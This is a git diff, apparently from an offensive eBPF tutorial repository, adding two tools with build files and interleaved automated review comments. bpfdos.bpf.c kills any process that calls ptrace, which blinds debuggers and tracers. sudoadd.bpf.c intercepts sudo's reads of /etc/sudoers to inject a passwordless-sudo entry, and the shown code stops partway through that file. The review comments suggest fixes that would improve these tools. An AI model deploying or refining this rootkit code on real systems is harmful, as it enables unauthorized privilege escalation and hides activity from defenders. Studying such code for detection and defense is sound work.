Clang's default includes on this system. We'll explicitly add these dirs +# to the includes list when compiling with `-target bpf` because otherwise some +# architecture-specific dirs will be "missing" on some architectures/distros - +# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h, +# sys/cdefs.h etc. might be missing. +# +# Use '-idirafter': Don't interfere with include mechanics except where the +# build would have failed anyways. 
+CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \ + | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }') + +ifeq ($(V),1) + Q = + msg = +else + Q = @ + msg = @printf ' %-8s %s%s\n' \ + "$(1)" \ + "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \ + "$(if $(3), $(3))"; + MAKEFLAGS += --no-print-directory +endif + +define allow-override + $(if $(or $(findstring environment,$(origin $(1))),\ + $(findstring command line,$(origin $(1)))),,\ + $(eval $(1) = $(2))) +endef + +$(call allow-override,CC,$(CROSS_COMPILE)cc) +$(call allow-override,LD,$(CROSS_COMPILE)ld) + +.PHONY: all +all: $(APPS) + +.PHONY: clean +clean: + $(call msg,CLEAN) + $(Q)rm -rf $(OUTPUT) $(APPS) + +$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT): + $(call msg,MKDIR,$@) + $(Q)mkdir -p $@ + +# Build libbpf +$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf + $(call msg,LIB,$@) + $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \ + OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \ + INCLUDEDIR= LIBDIR= UAPIDIR= \ + install + +# Build bpftool +$(BPFTOOL): | $(BPFTOOL_OUTPUT) + $(call msg,BPFTOOL,$@) + $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap + + +$(LIBBLAZESYM_SRC)/target/release/libblazesym.a:: + $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release + +$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB, $@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@ + +$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT) + $(call msg,LIB,$@) + $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@ + +# Build BPF code +$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL) + $(call msg,BPF,$@) + $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \ + $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \ + -c $(filter %.c,$^) -o $(patsubst 
%.bpf.o,%.tmp.bpf.o,$@) + $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@) + +# Generate BPF skeletons +$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL) + $(call msg,GEN-SKEL,$@) + $(Q)$(BPFTOOL) gen skeleton $< > $@ + +# Build user-space code +$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h + +$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT) + $(call msg,CC,$@) + $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@ + +$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER) + +$(BZS_APPS): $(LIBBLAZESYM_OBJ) + +# Build application binary +$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT) + $(call msg,BINARY,$@) + $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@ + +# delete failed targets +.DELETE_ON_ERROR: + +# keep intermediate (.skel.h, .bpf.o, etc) targets +.SECONDARY: diff --git a/src/25-signal/bpfdos.bpf.c b/src/25-signal/bpfdos.bpf.c new file mode 100644 index 0000000..4c83a41 --- /dev/null +++ b/src/25-signal/bpfdos.bpf.c 
@@ -0,0 +1,49 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#include "vmlinux.h"
+#include
+#include
+#include
+#include "common.h"
+
+char LICENSE[] SEC("license") = "Dual BSD/GPL";
+
+// Ringbuffer Map to pass messages from kernel to user
+struct {
+ __uint(type, BPF_MAP_TYPE_RINGBUF);
+ __uint(max_entries, 256 * 1024);
+} rb SEC(".maps");
+
+// Optional Target Parent PID
+const volatile int target_ppid = 0;
+
+SEC("tp/syscalls/sys_enter_ptrace")
+int bpf_dos(struct trace_event_raw_sys_enter *ctx)
+{
+ long ret = 0;
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ int pid = pid_tgid >> 32;
+
+ // if target_ppid is 0 then we target all pids
+ if (target_ppid != 0) {
+ struct task_struct *task = (struct task_struct *)bpf_get_current_task();
+ int ppid = BPF_CORE_READ(task, real_parent, tgid);
+ if (ppid != target_ppid) {
+ return 0;
+ }
+ }
+
+ // Send signal. 9 == SIGKILL
+ ret = bpf_send_signal(9);
+
+ // Log event
+ struct event *e;
+ e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
+ if (e) {
+ e->success = (ret == 0);
+ e->pid = pid;
+ bpf_get_current_comm(&e->comm, sizeof(e->comm));
+ bpf_ringbuf_submit(e, 0);
+ }
+
+ return 0;
+}
diff --git a/src/25-signal/bpfdos.c b/src/25-signal/bpfdos.c
new file mode 100644
index 0000000..062a1c9
--- /dev/null
+++ b/src/25-signal/bpfdos.c
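Review bot: `bpf_send_signal(9)` hard-codes the signal number with only the comment `9 == SIGKILL` to explain it; vmlinux.h does not provide the SIGKILL macro, so a local `#define SIGKILL 9` above the program, or a `const volatile int` that user space sets the way it sets target_ppid, would make the intent self-documenting. The header comment should also state that with target_ppid left at 0 every ptrace caller on the host — debuggers and strace included — is killed, and that because the signal is queued from the sys_enter tracepoint the ptrace call itself presumably still runs before the task is terminated on its return to user space; confirm that timing before documenting it.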
@@ -0,0 +1,129 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#include
+#include
+#include "bpfdos.skel.h"
+#include "common_um.h"
+#include "common.h"
+
+// Setup Argument stuff
+static struct env {
+ int target_ppid;
+} env;
+
+const char *argp_program_version = "bpfdos 1.0";
+const char *argp_program_bug_address = "";
+const char argp_program_doc[] =
+"BPF DOS\n"
+"\n"
+"Sends a SIGKILL to any program attempting to use\n"
+"the ptrace syscall (e.g. strace)\n"
+"\n"
+"USAGE: ./bpfdos [-t 1111]\n";
+
+static const struct argp_option opts[] = {
+ { "target-ppid", 't', "PPID", 0, "Optional Parent PID, will only affect its children." },
+ {},
+};
+static error_t parse_arg(int key, char *arg, struct argp_state *state)
+{
+ switch (key) {
+ case 't':
+ errno = 0;
+ env.target_ppid = strtol(arg, NULL, 10);
+ if (errno || env.target_ppid <= 0) {
+ fprintf(stderr, "Invalid pid: %s\n", arg);
+ argp_usage(state);
+ }
+ break;
+ case ARGP_KEY_ARG:
+ argp_usage(state);
+ break;
+ default:
+ return ARGP_ERR_UNKNOWN;
+ }
+ return 0;
+}
+static const struct argp argp = {
+ .options = opts,
+ .parser = parse_arg,
+ .doc = argp_program_doc,
+};
+
+static int handle_event(void *ctx, void *data, size_t data_sz)
+{
+ const struct event *e = data;
+ if (e->success)
+ printf("Killed PID %d (%s) for trying to use ptrace syscall\n", e->pid, e->comm);
+ else
+ printf("Failed to kill PID %d (%s) for trying to use ptrace syscall\n", e->pid, e->comm);
+ return 0;
+}
+
+int main(int argc, char **argv)
+{
+ struct ring_buffer *rb = NULL;
+ struct bpfdos_bpf *skel;
+ int err;
+
+ // Parse command line arguments
+ err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
+ if (err) {
+ return err;
+ }
+
+ // Do common setup
+ if (!setup()) {
+ exit(1);
+ }
+
+ // Open BPF application
+ skel = bpfdos_bpf__open();
+ if (!skel) {
+ fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
+ return 1;
+ }
+
+ // Set target ppid
+ skel->rodata->target_ppid = env.target_ppid;
+
+ // Verify and
load program
+ err = bpfdos_bpf__load(skel);
+ if (err) {
+ fprintf(stderr, "Failed to load and verify BPF skeleton\n");
+ goto cleanup;
+ }
+
+ // Attach tracepoint handler
+ err = bpfdos_bpf__attach( skel);
+ if (err) {
+ fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno));
+ goto cleanup;
+ }
+
+ // Set up ring buffer
+ rb = ring_buffer__new(bpf_map__fd( skel->maps.rb), handle_event, NULL, NULL);
+ if (!rb) {
+ err = -1;
+ fprintf(stderr, "Failed to create ring buffer\n");
+ goto cleanup;
+ }
+
+ printf("Successfully started!\n");
+ printf("Sending SIGKILL to any program using the bpf syscall\n");
+ while (!exiting) {
+ err = ring_buffer__poll(rb, 100 /* timeout, ms */);
+ /* Ctrl-C will cause -EINTR */
+ if (err == -EINTR) {
+ err = 0;
+ break;
+ }
+ if (err < 0) {
+ printf("Error polling perf buffer: %d\n", err);
+ break;
+ }
+ }
+
+cleanup:
+ bpfdos_bpf__destroy( skel);
+ return -err;
+}
diff --git a/src/25-signal/common.h b/src/25-signal/common.h
new file mode 100644
index 0000000..4686d92
--- /dev/null
+++ b/src/25-signal/common.h
@@ -0,0 +1,35 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#ifndef BAD_BPF_COMMON_H
+#define BAD_BPF_COMMON_H
+
+// These are used by a number of
+// different programs to sync eBPF Tail Call
+// login between user space and kernel
+#define PROG_00 0
+#define PROG_01 1
+#define PROG_02 2
+
+// Used when replacing text
+#define FILENAME_LEN_MAX 50
+#define TEXT_LEN_MAX 20
+
+// Simple message structure to get events from eBPF Programs
+// in the kernel to user spcae
+#define TASK_COMM_LEN 16
+struct event {
+ int pid;
+ char comm[TASK_COMM_LEN];
+ bool success;
+};
+
+struct tr_file {
+ char filename[FILENAME_LEN_MAX];
+ unsigned int filename_len;
+};
+
+struct tr_text {
+ char text[TEXT_LEN_MAX];
+ unsigned int text_len;
+};
+
+#endif // BAD_BPF_COMMON_H
diff --git a/src/25-signal/common_um.h b/src/25-signal/common_um.h
new file mode 100644
index 0000000..06267aa
--- /dev/null
+++ b/src/25-signal/common_um.h
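Review bot: the startup banner `printf("Sending SIGKILL to any program using the bpf syscall\n")` names the wrong syscall — the program attaches to `tp/syscalls/sys_enter_ptrace`, and both argp_program_doc and handle_event say ptrace — so it should read `printf("Sending SIGKILL to any program using the ptrace syscall\n")`. The poll loop and its exit-path messages are the same as in src/24-hide/pidhide.c, so the wording fixes proposed there apply here as well.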
@@ -0,0 +1,96 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#ifndef BAD_BPF_COMMON_UM_H
+#define BAD_BPF_COMMON_UM_H
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static volatile sig_atomic_t exiting;
+
+void sig_int(int signo)
+{
+ exiting = 1;
+}
+
+static bool setup_sig_handler() {
+ // Add handlers for SIGINT and SIGTERM so we shutdown cleanly
+ __sighandler_t sighandler = signal(SIGINT, sig_int);
+ if (sighandler == SIG_ERR) {
+ fprintf(stderr, "can't set signal handler: %s\n", strerror(errno));
+ return false;
+ }
+ sighandler = signal(SIGTERM, sig_int);
+ if (sighandler == SIG_ERR) {
+ fprintf(stderr, "can't set signal handler: %s\n", strerror(errno));
+ return false;
+ }
+ return true;
+}
+
+static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
+{
+ return vfprintf(stderr, format, args);
+}
+
+static bool bump_memlock_rlimit(void)
+{
+ struct rlimit rlim_new = {
+ .rlim_cur = RLIM_INFINITY,
+ .rlim_max = RLIM_INFINITY,
+ };
+
+ if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) {
+ fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n");
+ return false;
+ }
+ return true;
+}
+
+
+static bool setup() {
+ // Set up libbpf errors and debug info callback
+ libbpf_set_print(libbpf_print_fn);
+
+ // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything
+ if (!bump_memlock_rlimit()) {
+ return false;
+ };
+
+ // Setup signal handler so we exit cleanly
+ if (!setup_sig_handler()) {
+ return false;
+ }
+
+ return true;
+}
+
+
+#ifdef BAD_BPF_USE_TRACE_PIPE
+static void read_trace_pipe(void) {
+ int trace_fd;
+
+ trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0);
+ if (trace_fd == -1) {
+ printf("Error opening trace_pipe: %s\n", strerror(errno));
+ return;
+ }
+
+ while (!exiting) {
+ static char buf[4096];
+ ssize_t sz;
+
+ sz = read(trace_fd, buf, sizeof(buf) -1);
+ if (sz > 0) {
+ buf[sz] = '\x00';
+ puts(buf);
+ }
+ }
+}
+#endif // BAD_BPF_USE_TRACE_PIPE
+
+#endif // BAD_BPF_COMMON_UM_H
\ No newline at end of file
diff --git a/src/26-sudo/.gitignore b/src/26-sudo/.gitignore
new file mode 100644
index 0000000..81acd4b
--- /dev/null
+++ b/src/26-sudo/.gitignore
@@ -0,0 +1,9 @@
+.vscode
+package.json
+*.o
+*.skel.json
+*.skel.yaml
+package.yaml
+ecli
+bootstrap
+textreplace2
diff --git a/src/26-sudo/LICENSE b/src/26-sudo/LICENSE
new file mode 100644
index 0000000..47fc3a4
--- /dev/null
+++ b/src/26-sudo/LICENSE
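Review bot: `void sig_int(int signo)` is defined with external linkage inside a header, so a program that includes common_um.h from more than one translation unit gets a duplicate-symbol link error; every other function here is `static` and this one should be too: `static void sig_int(int signo)`. `read_trace_pipe` never closes `trace_fd` on either exit path, and when `read` fails the loop keeps spinning until `exiting` is set; a `close(trace_fd);` after the loop and a `break` on `sz < 0` would cover both. `static bool setup_sig_handler()` and `static bool setup()` should take `(void)` so they are not old-style unspecified-argument declarations. The identical file is added under src/26-sudo and src/27-replace further down, where the same points apply.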
@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2020, Andrii Nakryiko
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+
+3. Neither the name of the copyright holder nor the names of its
+ contributors may be used to endorse or promote products derived from
+ this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/src/26-sudo/Makefile b/src/26-sudo/Makefile
new file mode 100644
index 0000000..ecfd9e1
--- /dev/null
+++ b/src/26-sudo/Makefile
@@ -0,0 +1,141 @@
+# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
+OUTPUT := .output
+CLANG ?= clang
+LIBBPF_SRC := $(abspath ../../libbpf/src)
+BPFTOOL_SRC := $(abspath ../../bpftool/src)
+LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a)
+BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool)
+BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool
+LIBBLAZESYM_SRC := $(abspath ../../blazesym/)
+LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a)
+LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h)
+ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \
+ | sed 's/arm.*/arm/' \
+ | sed 's/aarch64/arm64/' \
+ | sed 's/ppc64le/powerpc/' \
+ | sed 's/mips.*/mips/' \
+ | sed 's/riscv64/riscv/' \
+ | sed 's/loongarch64/loongarch/')
+VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h
+# Use our own libbpf API headers and Linux UAPI headers distributed with
+# libbpf to avoid dependency on system-wide headers, which could be missing or
+# outdated
+INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX))
+CFLAGS := -g -Wall
+ALL_LDFLAGS := $(LDFLAGS) $(EXTRA_LDFLAGS)
+
+APPS = textreplace2 # minimal minimal_legacy uprobe kprobe fentry usdt sockfilter tc ksyscall
+
+CARGO ?= $(shell which cargo)
+ifeq ($(strip $(CARGO)),)
+BZS_APPS :=
+else
+BZS_APPS := # profile
+APPS += $(BZS_APPS)
+# Required by libblazesym
+ALL_LDFLAGS += -lrt -ldl -lpthread -lm
+endif
+
+# Get Clang's default includes on this system. We'll explicitly add these dirs
+# to the includes list when compiling with `-target bpf` because otherwise some
+# architecture-specific dirs will be "missing" on some architectures/distros -
+# headers such as asm/types.h, asm/byteorder.h, asm/socket.h, asm/sockios.h,
+# sys/cdefs.h etc. might be missing.
+#
+# Use '-idirafter': Don't interfere with include mechanics except where the
+# build would have failed anyways.
+CLANG_BPF_SYS_INCLUDES ?= $(shell $(CLANG) -v -E - &1 \
+ | sed -n '/<...> search starts here:/,/End of search list./{ s| \(/.*\)|-idirafter \1|p }')
+
+ifeq ($(V),1)
+ Q =
+ msg =
+else
+ Q = @
+ msg = @printf ' %-8s %s%s\n' \
+ "$(1)" \
+ "$(patsubst $(abspath $(OUTPUT))/%,%,$(2))" \
+ "$(if $(3), $(3))";
+ MAKEFLAGS += --no-print-directory
+endif
+
+define allow-override
+ $(if $(or $(findstring environment,$(origin $(1))),\
+ $(findstring command line,$(origin $(1)))),,\
+ $(eval $(1) = $(2)))
+endef
+
+$(call allow-override,CC,$(CROSS_COMPILE)cc)
+$(call allow-override,LD,$(CROSS_COMPILE)ld)
+
+.PHONY: all
+all: $(APPS)
+
+.PHONY: clean
+clean:
+ $(call msg,CLEAN)
+ $(Q)rm -rf $(OUTPUT) $(APPS)
+
+$(OUTPUT) $(OUTPUT)/libbpf $(BPFTOOL_OUTPUT):
+ $(call msg,MKDIR,$@)
+ $(Q)mkdir -p $@
+
+# Build libbpf
+$(LIBBPF_OBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(OUTPUT)/libbpf
+ $(call msg,LIB,$@)
+ $(Q)$(MAKE) -C $(LIBBPF_SRC) BUILD_STATIC_ONLY=1 \
+ OBJDIR=$(dir $@)/libbpf DESTDIR=$(dir $@) \
+ INCLUDEDIR= LIBDIR= UAPIDIR= \
+ install
+
+# Build bpftool
+$(BPFTOOL): | $(BPFTOOL_OUTPUT)
+ $(call msg,BPFTOOL,$@)
+ $(Q)$(MAKE) ARCH= CROSS_COMPILE= OUTPUT=$(BPFTOOL_OUTPUT)/ -C $(BPFTOOL_SRC) bootstrap
+
+
+$(LIBBLAZESYM_SRC)/target/release/libblazesym.a::
+ $(Q)cd $(LIBBLAZESYM_SRC) && $(CARGO) build --features=cheader,dont-generate-test-files --release
+
+$(LIBBLAZESYM_OBJ): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT)
+ $(call msg,LIB, $@)
+ $(Q)cp $(LIBBLAZESYM_SRC)/target/release/libblazesym.a $@
+
+$(LIBBLAZESYM_HEADER): $(LIBBLAZESYM_SRC)/target/release/libblazesym.a | $(OUTPUT)
+ $(call msg,LIB,$@)
+ $(Q)cp $(LIBBLAZESYM_SRC)/target/release/blazesym.h $@
+
+# Build BPF code
+$(OUTPUT)/%.bpf.o: %.bpf.c $(LIBBPF_OBJ) $(wildcard %.h) $(VMLINUX) | $(OUTPUT) $(BPFTOOL)
+ $(call msg,BPF,$@)
+ $(Q)$(CLANG) -g -O2 -target bpf -D__TARGET_ARCH_$(ARCH) \
+ $(INCLUDES) $(CLANG_BPF_SYS_INCLUDES) \
+ -c $(filter %.c,$^) -o $(patsubst %.bpf.o,%.tmp.bpf.o,$@)
+ $(Q)$(BPFTOOL) gen object $@ $(patsubst %.bpf.o,%.tmp.bpf.o,$@)
+
+# Generate BPF skeletons
+$(OUTPUT)/%.skel.h: $(OUTPUT)/%.bpf.o | $(OUTPUT) $(BPFTOOL)
+ $(call msg,GEN-SKEL,$@)
+ $(Q)$(BPFTOOL) gen skeleton $< > $@
+
+# Build user-space code
+$(patsubst %,$(OUTPUT)/%.o,$(APPS)): %.o: %.skel.h
+
+$(OUTPUT)/%.o: %.c $(wildcard %.h) | $(OUTPUT)
+ $(call msg,CC,$@)
+ $(Q)$(CC) $(CFLAGS) $(INCLUDES) -c $(filter %.c,$^) -o $@
+
+$(patsubst %,$(OUTPUT)/%.o,$(BZS_APPS)): $(LIBBLAZESYM_HEADER)
+
+$(BZS_APPS): $(LIBBLAZESYM_OBJ)
+
+# Build application binary
+$(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) | $(OUTPUT)
+ $(call msg,BINARY,$@)
+ $(Q)$(CC) $(CFLAGS) $^ $(ALL_LDFLAGS) -lelf -lz -o $@
+
+# delete failed targets
+.DELETE_ON_ERROR:
+
+# keep intermediate (.skel.h, .bpf.o, etc) targets
+.SECONDARY:
diff --git a/src/26-sudo/common.h b/src/26-sudo/common.h
new file mode 100644
index 0000000..4686d92
--- /dev/null
+++ b/src/26-sudo/common.h
@@ -0,0 +1,35 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#ifndef BAD_BPF_COMMON_H
+#define BAD_BPF_COMMON_H
+
+// These are used by a number of
+// different programs to sync eBPF Tail Call
+// login between user space and kernel
+#define PROG_00 0
+#define PROG_01 1
+#define PROG_02 2
+
+// Used when replacing text
+#define FILENAME_LEN_MAX 50
+#define TEXT_LEN_MAX 20
+
+// Simple message structure to get events from eBPF Programs
+// in the kernel to user spcae
+#define TASK_COMM_LEN 16
+struct event {
+ int pid;
+ char comm[TASK_COMM_LEN];
+ bool success;
+};
+
+struct tr_file {
+ char filename[FILENAME_LEN_MAX];
+ unsigned int filename_len;
+};
+
+struct tr_text {
+ char text[TEXT_LEN_MAX];
+ unsigned int text_len;
+};
+
+#endif // BAD_BPF_COMMON_H
diff --git a/src/26-sudo/common_um.h b/src/26-sudo/common_um.h
new file mode 100644
index 0000000..06267aa
--- /dev/null
+++ b/src/26-sudo/common_um.h
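Review bot: `APPS = textreplace2` names a program that does not exist in this directory, where the sources added by this commit are sudoadd.c and sudoadd.bpf.c, so `make` in src/26-sudo builds none of the directory's own code; the line presumably should read `APPS = sudoadd`. The byte-identical Makefile is added under src/27-replace, whose BPF source is textreplace.bpf.c, so it needs `APPS = textreplace` there rather than textreplace2. The `CLANG_BPF_SYS_INCLUDES` command reads `$(CLANG) -v -E - &1 \`, which looks truncated by rendering (the libbpf-bootstrap original presumably redirects stdin from /dev/null and stderr to stdout); worth confirming the committed file carries the full redirection. `$(wildcard %.h)` in the `%.bpf.o` and `%.o` prerequisite lists is expanded at parse time before the stem is substituted, so it matches nothing and header edits do not trigger rebuilds; if that dependency is intended, the headers should be listed explicitly.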
@@ -0,0 +1,96 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#ifndef BAD_BPF_COMMON_UM_H
+#define BAD_BPF_COMMON_UM_H
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static volatile sig_atomic_t exiting;
+
+void sig_int(int signo)
+{
+ exiting = 1;
+}
+
+static bool setup_sig_handler() {
+ // Add handlers for SIGINT and SIGTERM so we shutdown cleanly
+ __sighandler_t sighandler = signal(SIGINT, sig_int);
+ if (sighandler == SIG_ERR) {
+ fprintf(stderr, "can't set signal handler: %s\n", strerror(errno));
+ return false;
+ }
+ sighandler = signal(SIGTERM, sig_int);
+ if (sighandler == SIG_ERR) {
+ fprintf(stderr, "can't set signal handler: %s\n", strerror(errno));
+ return false;
+ }
+ return true;
+}
+
+static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
+{
+ return vfprintf(stderr, format, args);
+}
+
+static bool bump_memlock_rlimit(void)
+{
+ struct rlimit rlim_new = {
+ .rlim_cur = RLIM_INFINITY,
+ .rlim_max = RLIM_INFINITY,
+ };
+
+ if (setrlimit(RLIMIT_MEMLOCK, &rlim_new)) {
+ fprintf(stderr, "Failed to increase RLIMIT_MEMLOCK limit! (hint: run as root)\n");
+ return false;
+ }
+ return true;
+}
+
+
+static bool setup() {
+ // Set up libbpf errors and debug info callback
+ libbpf_set_print(libbpf_print_fn);
+
+ // Bump RLIMIT_MEMLOCK to allow BPF sub-system to do anything
+ if (!bump_memlock_rlimit()) {
+ return false;
+ };
+
+ // Setup signal handler so we exit cleanly
+ if (!setup_sig_handler()) {
+ return false;
+ }
+
+ return true;
+}
+
+
+#ifdef BAD_BPF_USE_TRACE_PIPE
+static void read_trace_pipe(void) {
+ int trace_fd;
+
+ trace_fd = open("/sys/kernel/debug/tracing/trace_pipe", O_RDONLY, 0);
+ if (trace_fd == -1) {
+ printf("Error opening trace_pipe: %s\n", strerror(errno));
+ return;
+ }
+
+ while (!exiting) {
+ static char buf[4096];
+ ssize_t sz;
+
+ sz = read(trace_fd, buf, sizeof(buf) -1);
+ if (sz > 0) {
+ buf[sz] = '\x00';
+ puts(buf);
+ }
+ }
+}
+#endif // BAD_BPF_USE_TRACE_PIPE
+
+#endif // BAD_BPF_COMMON_UM_H
\ No newline at end of file
diff --git a/src/26-sudo/sudoadd.bpf.c b/src/26-sudo/sudoadd.bpf.c
new file mode 100644
index 0000000..3e81b80
--- /dev/null
+++ b/src/26-sudo/sudoadd.bpf.c
@@ -0,0 +1,217 @@
+// SPDX-License-Identifier: BSD-3-Clause
+#include "vmlinux.h"
+#include
+#include
+#include
+#include "common.h"
+
+char LICENSE[] SEC("license") = "Dual BSD/GPL";
+
+// Ringbuffer Map to pass messages from kernel to user
+struct {
+ __uint(type, BPF_MAP_TYPE_RINGBUF);
+ __uint(max_entries, 256 * 1024);
+} rb SEC(".maps");
+
+// Map to hold the File Descriptors from 'openat' calls
+struct {
+ __uint(type, BPF_MAP_TYPE_HASH);
+ __uint(max_entries, 8192);
+ __type(key, size_t);
+ __type(value, unsigned int);
+} map_fds SEC(".maps");
+
+// Map to fold the buffer sized from 'read' calls
+struct {
+ __uint(type, BPF_MAP_TYPE_HASH);
+ __uint(max_entries, 8192);
+ __type(key, size_t);
+ __type(value, long unsigned int);
+} map_buff_addrs SEC(".maps");
+
+// Optional Target Parent PID
+const volatile int target_ppid = 0;
+
+// The UserID of the user, if we're restricting
+// running to just this user
+const volatile int uid = 0;
+
+// These store the string we're going to
+// add to /etc/sudoers when viewed by sudo
+// Which makes it think our user can sudo
+// without a password
+const int max_payload_len = 100;
+const volatile int payload_len = 0;
+const volatile char payload[max_payload_len];
+
+SEC("tp/syscalls/sys_enter_openat")
+int handle_openat_enter(struct trace_event_raw_sys_enter *ctx)
+{
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ int pid = pid_tgid >> 32;
+ // Check if we're a process thread of interest
+ // if target_ppid is 0 then we target all pids
+ if (target_ppid != 0) {
+ struct task_struct *task = (struct task_struct *)bpf_get_current_task();
+ int ppid = BPF_CORE_READ(task, real_parent, tgid);
+ if (ppid != target_ppid) {
+ return 0;
+ }
+ }
+
+ // Check comm is sudo
+ char comm[TASK_COMM_LEN];
+ bpf_get_current_comm(comm, sizeof(comm));
+ const int sudo_len = 5;
+ const char *sudo = "sudo";
+ for (int i = 0; i < sudo_len; i++) {
+ if (comm[i] != sudo[i]) {
+ return 0;
+ }
+ }
+
+ // Now check we're opening sudoers
+ const int sudoers_len = 13;
+ const char *sudoers = "/etc/sudoers";
+ char filename[sudoers_len];
+ bpf_probe_read_user(&filename, sudoers_len, (char*)ctx->args[1]);
+ for (int i = 0; i < sudoers_len; i++) {
+ if (filename[i] != sudoers[i]) {
+ return 0;
+ }
+ }
+ bpf_printk("Comm %s\n", comm);
+ bpf_printk("Filename %s\n", filename);
+
+ // If filtering by UID check that
+ if (uid != 0) {
+ int current_uid = bpf_get_current_uid_gid() >> 32;
+ if (uid != current_uid) {
+ return 0;
+ }
+ }
+
+ // Add pid_tgid to map for our sys_exit call
+ unsigned int zero = 0;
+ bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY);
+
+ return 0;
+}
+
+SEC("tp/syscalls/sys_exit_openat")
+int handle_openat_exit(struct trace_event_raw_sys_exit *ctx)
+{
+ // Check this open call is opening our target file
+ size_t pid_tgid = bpf_get_current_pid_tgid();
+ unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid);
+ if (check == 0) {
+ return 0;
+ }
+ int pid = pid_tgid >> 32;
+
+ // Set the map value to be the returned file descriptor
